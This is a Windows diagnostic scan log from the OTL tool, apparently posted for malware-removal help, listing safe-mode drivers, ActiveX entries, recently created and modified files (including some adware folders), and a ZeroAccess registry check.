Driver GroupSafeBootNet: PNP_TDI - Driver GroupSafeBootNet: Primary disk - Driver GroupSafeBootNet: rdpencdd.sys - DriverSafeBootNet: rdsessmgr - ServiceSafeBootNet: sacsvr - ServiceSafeBootNet: SCSI Class - Driver GroupSafeBootNet: SmartcardSimulator - DriverSafeBootNet: Streams Drivers - Driver GroupSafeBootNet: System Bus Extender - Driver GroupSafeBootNet: TBS - ServiceSafeBootNet: TDI - Driver GroupSafeBootNet: VirtualSmartcardReader - DriverSafeBootNet: vmms - ServiceSafeBootNet: WudfUsbccidDriver - DriverSafeBootNet: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllersSafeBootNet: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM DriveSafeBootNet: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDriveSafeBootNet: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controllerSafeBootNet: {4D36E96A-E325-11CE-BFC1-08002BE10318} - HdcSafeBootNet: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard

SafeBootNet: {4D36E96F-E325-11CE-BFC1-08002BE10318} - MouseSafeBootNet: {4D36E972-E325-11CE-BFC1-08002BE10318} - NetSafeBootNet: {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClientSafeBootNet: {4D36E974-E325-11CE-BFC1-08002BE10318} - NetServiceSafeBootNet: {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTransSafeBootNet: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA AdaptersSafeBootNet: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapterSafeBootNet: {4D36E97D-E325-11CE-BFC1-08002BE10318} - SystemSafeBootNet: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk driveSafeBootNet: {50DD5230-BA8A-11D1-BF5D-0000F805F530} - Smart card readersSafeBootNet: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copySafeBootNet: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllersSafeBootNet: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - VolumeSafeBootNet: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface DevicesSafeBootNet: {9DA2B80F-F89F-4A49-A5C2-511B085B9E8A} - Enhanced Storage DevicesSafeBootNet: {A0A588A4-C46F-4B37-B7EA-C82FE89870C6} - SDA Standard Compliant SD Host ControllerSafeBootNet: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 DevicesSafeBootNet: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices ActiveX:[b]64bit:[/b] {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0ActiveX:[b]64bit:[/b] {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstallActiveX:[b]64bit:[/b] {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing PackActiveX:[b]64bit:[/b] {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOEActiveX:[b]64bit:[/b] {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawExActiveX:[b]64bit:[/b] {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer HelpActiveX:[b]64bit:[/b] {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6ActiveX:[b]64bit:[/b] {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup ToolsActiveX:[b]64bit:[/b] {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing EnhancementsActiveX:[b]64bit:[/b] {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media PlayerActiveX:[b]64bit:[/b] {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site AccessActiveX:[b]64bit:[/b] {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7ActiveX:[b]64bit:[/b] {78E345F7-E976-3595-9C30-2458D6A8EC32} - .NET FrameworkActiveX:[b]64bit:[/b] {89820200-ECBD-11cf-8B85-00AA005B4340} - UActiveX:[b]64bit:[/b] {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\System32\ie4uinit.exe -UserConfigActiveX:[b]64bit:[/b] {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\System32\Rundll32.exe C:\Windows\System32\mscories.dll,InstallActiveX:[b]64bit:[/b] {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data BindingActiveX:[b]64bit:[/b] {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core FontsActiveX:[b]64bit:[/b] {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML HelpActiveX:[b]64bit:[/b] {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service InterfaceActiveX:[b]64bit:[/b] {FEBEF00C-046D-438D-8A88-BF94A6C9E703} - .NET FrameworkActiveX:[b]64bit:[/b] >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMPActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0

ActiveX: {25FFAAD0-F4A3-4164-95FF-4461E9F35D51} - .NET FrameworkActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing PackActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOEActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawExActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer HelpActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup ToolsActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing EnhancementsActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media PlayerActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site AccessActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET FrameworkActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\SysWOW64\Rundll32.exe C:\Windows\SysWOW64\mscories.dll,InstallActiveX: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chromeActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data BindingActiveX: {C6BAF60B-6E91-453F-BFF9-D3789CFEFCDD} - .NET FrameworkActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core FontsActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML HelpActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service InterfaceActiveX: {EC43E638-09F0-38CC-A585-72FCCDDF035C} - .NET FrameworkActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP Drivers32:[b]64bit:[/b] msacm.l3acm - C:\Windows\System32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)Drivers32: msacm.l3acm - C:\Windows\SysWOW64\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)Drivers32: vidc.cvid - C:\Windows\SysWow64\iccvid.dll (Radius Inc.) CREATERESTOREPOINTRestore point Set: OTL Restore Point [color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color] [2014.09.05 21:31:07 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ZHP[2014.09.05 21:31:06 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\ZHPDiag[2014.09.05 21:31:06 | 000,000,000 | ---D | C] -- C:\Users\Muller\AppData\Roaming\ZHP[2014.09.05 20:00:13 | 000,000,000 | ---D | C] -- C:\Users\Muller\AppData\Local\AOP SDK[2014.09.04 22:42:48 | 000,000,000 | ---D | C] -- C:\ProgramData\APN[2014.09.04 22:40:54 | 000,000,000 | ---D | C] -- C:\ProgramData\Oracle[2014.09.04 22:40:46 | 000,000,000 | ---D | C] -- C:\ProgramData\Sun[2014.09.04 22:40:45 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Java[2014.09.04 22:40:44 | 000,272,808 | ---- | C] (Oracle Corporation) -- C:\Windows\SysWow64\javaws.exe[2014.09.04 22:40:41 | 000,175,528 | ---- | C] (Oracle Corporation) -- C:\Windows\SysWow64\javaw.exe

[2014.09.04 22:40:41 | 000,175,528 | ---- | C] (Oracle Corporation) -- C:\Windows\SysWow64\java.exe[2014.09.04 22:40:41 | 000,098,216 | ---- | C] (Oracle Corporation) -- C:\Windows\SysWow64\WindowsAccessBridge-32.dll[2014.09.04 22:40:41 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java[2014.09.04 22:40:35 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Java[2014.09.03 21:09:34 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\ExtraShoppeer[2014.09.01 14:37:23 | 000,000,000 | ---D | C] -- C:\ProgramData\ExtraShoppeer[2014.08.30 20:24:52 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Skype[2014.08.20 20:44:10 | 000,000,000 | ---D | C] -- C:\ProgramData\UltraCoupon[2014.08.13 22:16:48 | 000,697,856 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll[2014.08.13 22:16:48 | 000,527,360 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll[2014.08.13 22:16:43 | 000,918,528 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MrmCoreR.dll[2014.08.13 19:39:38 | 002,133,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dwmcore.dll[2014.08.13 19:39:38 | 000,517,528 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxgi.dll[2014.08.13 19:39:34 | 002,001,920 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\inetcpl.cpl[2014.08.13 19:39:33 | 000,631,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msfeeds.dll[2014.08.13 19:39:33 | 000,452,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtmsft.dll[2014.08.13 19:39:32 | 002,087,936 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\inetcpl.cpl[2014.08.13 19:39:31 | 000,704,512 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieapfltr.dll[2014.08.13 19:39:30 | 000,292,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtrans.dll[2014.08.13 19:39:29 | 005,824,512 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9.dll[2014.08.13 19:39:29 | 000,758,272 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9diag.dll[2014.08.13 19:39:29 | 000,085,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll[2014.08.13 19:39:28 | 000,846,336 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieapfltr.dll[2014.08.13 19:39:27 | 000,069,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll[2014.08.13 19:39:26 | 000,597,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\jscript9diag.dll[2014.08.13 19:39:17 | 000,692,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ie4uinit.exe[2014.08.13 19:39:16 | 000,083,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MshtmlDac.dll[2014.08.13 19:39:16 | 000,072,704 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\JavaScriptCollectionAgent.dll[2014.08.13 19:39:16 | 000,061,952 | ---- | C] (Microsoft Corporation) --

C:\Windows\SysWow64\MshtmlDac.dll[2014.08.13 19:39:16 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll[2014.08.13 19:39:14 | 000,548,352 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\vbscript.dll[2014.08.13 19:38:18 | 001,273,184 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rpcrt4.dll[2014.08.13 19:38:14 | 000,035,480 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\TsWpfWrp.exe[2014.08.13 19:38:14 | 000,035,480 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\TsWpfWrp.exe[2014.08.13 19:35:03 | 003,118,080 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\Wpc.dll[2014.08.13 19:35:02 | 003,048,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\WpcMon.exe[2014.08.13 19:35:02 | 002,861,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\WpcWebSync.dll[2014.08.13 19:35:02 | 002,344,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\Wpc.dll[2014.08.13 19:35:01 | 004,756,992 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\SyncEngine.dll[2014.08.13 19:35:01 | 001,120,256 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\SkyDrive.exe[2014.08.13 19:35:01 | 000,716,800 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\SkyDriveTelemetry.dll[2014.08.13 19:34:52 | 002,144,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mfcore.dll[2014.08.13 19:34:51 | 002,125,344 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\d3d9.dll[2014.08.13 19:34:49 | 002,140,888 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mfcore.dll[2014.08.13 19:34:49 | 001,025,536 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\localspl.dll[2014.08.13 19:34:48 | 002,844,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\actxprxy.dll[2014.08.13 19:34:48 | 001,726,224 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntdll.dll[2014.08.13 19:34:48 | 000,721,408 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\fveapi.dll[2014.08.13 19:34:48 | 000,403,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\vpnike.dll[2014.08.13 19:34:48 | 000,301,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\framedynos.dll[2014.08.13 19:34:48 | 000,285,696 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\SkyDriveShell.dll[2014.08.13 19:34:48 | 000,265,216 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\SkyDriveShell.dll[2014.08.13 19:34:47 | 000,271,872 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dhcpcore6.dll[2014.08.13 19:34:47 | 000,262,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\framedyn.dll[2014.08.13 19:34:47 | 000,235,008 | ---- | C] (Microsoft Corporation) --

C:\Windows\SysWow64\framedynos.dll[2014.08.13 19:34:47 | 000,229,888 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dhcpcore6.dll[2014.08.13 19:34:47 | 000,207,360 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\framedyn.dll[2014.08.13 19:34:47 | 000,123,392 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\Robocopy.exe[2014.08.13 19:34:47 | 000,118,272 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winbici.dll[2014.08.13 19:34:47 | 000,106,496 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\Robocopy.exe[2014.08.13 19:34:47 | 000,076,800 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\BulkOperationHost.exe[2014.08.13 19:34:47 | 000,071,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ncobjapi.dll[2014.08.13 19:34:47 | 000,065,024 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dhcpcsvc6.dll[2014.08.13 19:34:47 | 000,052,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ncobjapi.dll[2014.08.13 19:34:46 | 000,997,888 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\reseteng.dll[2014.08.13 19:34:37 | 016,871,936 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\Windows.UI.Xaml.dll[2014.08.13 19:34:34 | 012,711,424 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\Windows.UI.Xaml.dll[2014.08.13 19:34:34 | 000,467,800 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\USBHUB3.SYS[2014.08.13 19:34:34 | 000,440,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\usbport.sys[2014.08.13 19:34:34 | 000,284,672 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\WUDFHost.exe[2014.08.13 19:34:34 | 000,216,368 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rsaenh.dll[2014.08.13 19:34:34 | 000,209,408 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\WUDFPlatform.dll[2014.08.13 19:34:33 | 000,423,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\hal.dll[2014.08.13 19:34:33 | 000,323,584 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\DaOtpCredentialProvider.dll[2014.08.13 19:34:33 | 000,270,848 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\DaOtpCredentialProvider.dll[2014.08.13 19:34:33 | 000,027,480 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\usbd.sys[2014.08.13 19:34:30 | 002,642,944 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\authui.dll[2014.08.13 19:34:29 | 002,790,912 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msi.dll[2014.08.13 19:34:29 | 002,318,336 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\authui.dll[2014.08.13 19:34:29 | 000,623,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MDMAgent.exe[2014.08.13 19:34:29 | 000,356,352 | ---- | C] (Microsoft Corporation) --

C:\Windows\SysNative\msihnd.dll[2014.08.13 19:34:29 | 000,281,088 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msihnd.dll[2014.08.13 19:34:29 | 000,114,520 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\consent.exe[2014.08.13 19:34:28 | 001,336,624 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\gdi32.dll [color=#E56717]========== Files - Modified Within 30 Days ==========[/color] [2014.09.09 17:01:00 | 000,001,088 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job[2014.09.09 16:56:00 | 000,001,002 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job[2014.09.09 16:55:00 | 000,000,316 | ---- | M] () -- C:\Windows\tasks\MySearchDial.job[2014.09.09 15:09:21 | 000,055,460 | ---- | M] () -- C:\Users\Muller\carpostalgraubunden.php[2014.09.09 13:23:53 | 000,067,584 | -H-- | M] () -- C:\Windows\bootstat.dat[2014.09.08 20:24:31 | 000,001,084 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job[2014.09.08 20:23:38 | 000,362,680 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT[2014.09.08 20:23:17 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys[2014.09.08 20:23:08 | 2476,543,999 | -HS- | M] () -- C:\hiberfil.sys[2014.09.05 21:31:07 | 000,002,011 | ---- | M] () -- C:\Users\Muller\Desktop\ZHPFix.lnk[2014.09.05 21:31:07 | 000,001,880 | ---- | M] () -- C:\Users\Muller\Desktop\ZHPDiag.lnk[2014.09.05 20:00:32 | 000,002,069 | ---- | M] () -- C:\Users\Public\Desktop\abDocs.lnk[2014.09.04 22:40:36 | 000,272,808 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\javaws.exe[2014.09.04 22:40:36 | 000,175,528 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\javaw.exe[2014.09.04 22:40:36 | 000,175,528 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\java.exe[2014.09.04 22:40:36 | 000,098,216 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\WindowsAccessBridge-32.dll[2014.09.02 22:07:00 | 000,072,529 | ---- | M] () -- C:\Users\Muller\carpostalbern2.php[2014.08.31 20:33:25 | 002,737,336 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI[2014.08.31 20:33:25 | 000,812,350 | ---- | M] () -- C:\Windows\SysNative\perfh00C.dat[2014.08.31 20:33:25 | 000,754,248 | ---- | M] () -- C:\Windows\SysNative\perfh007.dat[2014.08.31 20:33:25 | 000,722,476 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat[2014.08.31 20:33:25 | 000,159,412 | ---- | M] () -- C:\Windows\SysNative\perfc00C.dat[2014.08.31 20:33:25 | 000,158,900 | ---- | M] () -- C:\Windows\SysNative\perfc007.dat[2014.08.31 20:33:25 | 000,135,592 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat[2014.08.30 22:14:38 | 000,076,396 | ---- | M] () -- C:\Users\Muller\zb.php[2014.08.27 22:07:57 | 000,042,277 | ---- | M] () -- C:\Users\Muller\tpfnormal.php[2014.08.26 20:21:59 | 000,068,159 | ---- | M] () -- C:\Users\Muller\carpostalost.php[2014.08.26 20:11:36 | 000,012,662 | ---- | M] () -- C:\Users\Muller\carpostalnational.php[2014.08.26 19:39:06 | 000,067,110 | ---- | M] () -- C:\Users\Muller\carpostalest.php[2014.08.13 19:33:44 | 000,233,912 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\mfps.dll[2014.08.13 19:29:51 | 000,428,888 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\FWPKCLNT.SYS[2014.08.13 19:28:55 | 000,164,864 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\msrating.dll

[2014.08.13 19:28:34 | 000,111,616 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollector.exe[2014.08.13 19:28:34 | 000,048,640 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwproxystub.dll[2014.08.13 19:28:34 | 000,004,096 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollectorres.dll[2014.08.13 19:28:33 | 000,051,200 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\ieetwproxystub.dll[2014.08.13 19:28:32 | 000,139,264 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\ieUnatt.exe[2014.08.13 19:28:30 | 000,112,128 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\ieUnatt.exe[2014.08.13 19:28:28 | 000,061,952 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\iesetup.dll[2014.08.13 19:28:28 | 000,032,768 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\iernonce.dll[2014.08.13 19:28:27 | 000,066,048 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\iesetup.dll[2014.08.13 19:28:27 | 000,033,792 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\iernonce.dll[2014.08.13 19:28:16 | 000,195,584 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\msrating.dll [color=#E56717]========== Files Created - No Company Name ==========[/color] [2014.09.05 21:31:07 | 000,002,011 | ---- | C] () -- C:\Users\Muller\Desktop\ZHPFix.lnk[2014.09.05 21:31:07 | 000,001,880 | ---- | C] () -- C:\Users\Muller\Desktop\ZHPDiag.lnk[2014.09.05 20:00:31 | 000,002,069 | ---- | C] () -- C:\Users\Public\Desktop\abDocs.lnk[2014.09.02 20:27:23 | 000,072,529 | ---- | C] () -- C:\Users\Muller\carpostalbern2.php[2014.08.30 20:28:15 | 000,002,302 | ---- | C] () -- C:\Users\Muller\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Acer Games.lnk[2014.08.26 14:47:25 | 000,068,159 | ---- | C] () -- C:\Users\Muller\carpostalost.php[2014.08.13 19:34:46 | 000,050,745 | ---- | C] () -- C:\Windows\SysNative\srms.dat[2014.06.30 19:29:45 | 000,055,460 | ---- | C] () -- C:\Users\Muller\carpostalgraubunden.php[2014.06.20 15:56:55 | 000,003,058 | ---- | C] () -- C:\Users\Muller\index.php[2014.06.10 21:48:12 | 000,036,859 | ---- | C] () -- C:\Users\Muller\bob.php[2014.06.10 16:13:39 | 000,215,783 | ---- | C] () -- C:\Users\Muller\tpftrio.jpg[2014.06.06 20:48:33 | 000,042,277 | ---- | C] () -- C:\Users\Muller\tpfnormal.php[2014.06.06 20:48:30 | 000,060,653 | ---- | C] () -- C:\Users\Muller\tpfmetrique.php[2014.06.06 20:48:21 | 000,003,524 | ---- | C] () -- C:\Users\Muller\tpf.php[2014.06.06 20:09:23 | 000,035,808 | ---- | C] () -- C:\Users\Muller\mc.php[2014.06.06 19:50:24 | 000,019,828 | ---- | C] () -- C:\Users\Muller\mo.php[2014.06.02 15:34:00 | 000,002,870 | ---- | C] () -- C:\Users\Muller\style2.css[2014.04.25 21:49:03 | 000,002,255 | ---- | C] () -- C:\Windows\SysWow64\WimBootCompress.ini[2014.03.24 17:41:48 | 000,019,622 | ---- | C] () -- C:\Users\Muller\carpostalzurich.php[2014.03.24 17:41:43 | 000,053,810 | ---- | C] () -- C:\Users\Muller\carpostalvalais.php[2014.03.24 17:41:37 | 000,036,514 | ---- | C] () -- C:\Users\Muller\carpostaltessin.php[2014.03.24 17:41:30 | 000,054,496 | ---- | C] () -- C:\Users\Muller\carpostalouest.php[2014.03.24 17:41:25 | 000,074,891 | ---- | C] () -- C:\Users\Muller\carpostalnord.php[2014.03.24 17:41:22 | 000,012,662 | ---- | C] () -- C:\Users\Muller\carpostalnational.php[2014.03.24 17:41:16 | 000,054,113 | ---- | C] () -- C:\Users\Muller\carpostalgrison.php[2014.03.24 17:41:07 | 000,067,110 | ---- | C] () -- C:\Users\Muller\carpostalest.php

[2014.03.24 17:41:01 | 000,025,751 | ---- | C] () -- C:\Users\Muller\carpostalcentral.php[2014.03.24 17:40:56 | 000,037,949 | ---- | C] () -- C:\Users\Muller\carpostalberne.php[2014.03.24 17:40:42 | 000,076,533 | ---- | C] () -- C:\Users\Muller\carpostal.php[2014.03.20 16:08:12 | 000,000,116 | ---- | C] () -- C:\Windows\wininit.ini[2014.03.18 23:18:28 | 000,076,396 | ---- | C] () -- C:\Users\Muller\zb.php[2014.03.18 22:50:09 | 000,102,328 | ---- | C] () -- C:\Users\Muller\tpc.php[2014.03.18 22:36:48 | 000,002,556 | ---- | C] () -- C:\Users\Muller\style.css[2014.03.18 22:28:14 | 000,009,702 | ---- | C] () -- C:\Users\Muller\informations.php[2014.03.18 02:15:53 | 000,103,936 | ---- | C] () -- C:\Windows\SysWow64\OEMLicense.dll[2014.03.17 22:55:09 | 000,000,121 | ---- | C] () -- C:\Users\Muller\AppData\Roaming\WB.CFG[2013.12.29 00:35:56 | 000,000,000 | -H-- | C] () -- C:\ProgramData\DP45977C.lfl[2013.09.09 19:35:17 | 000,303,104 | ---- | C] () -- C:\Windows\SysWow64\igdmd32.dll[2013.09.09 19:35:09 | 000,180,736 | ---- | C] () -- C:\Windows\SysWow64\igdde32.dll[2013.09.09 19:35:06 | 000,142,848 | ---- | C] () -- C:\Windows\SysWow64\igdail32.dll[2013.08.22 17:36:43 | 000,215,943 | ---- | C] () -- C:\Windows\SysWow64\dssec.dat[2013.08.22 17:36:42 | 000,000,741 | ---- | C] () -- C:\Windows\SysWow64\NOISE.DAT[2013.08.22 16:46:23 | 000,067,584 | -H-- | C] () -- C:\Windows\bootstat.dat[2013.08.22 09:01:23 | 000,043,131 | ---- | C] () -- C:\Windows\mib.bin[2013.08.22 05:32:36 | 000,046,080 | ---- | C] () -- C:\Windows\SysWow64\BWContextHandler.dll[2013.08.22 01:55:20 | 000,364,544 | ---- | C] () -- C:\Windows\SysWow64\msjetoledb40.dll[2013.08.22 01:52:39 | 000,673,088 | ---- | C] () -- C:\Windows\SysWow64\mlang.dat[2013.05.12 03:17:52 | 000,001,536 | ---- | C] () -- C:\Windows\SysWow64\IusEventLog.dll [color=#E56717]========== ZeroAccess Check ==========[/color] [2013.12.29 00:57:50 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini [HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64 [HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] [HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64 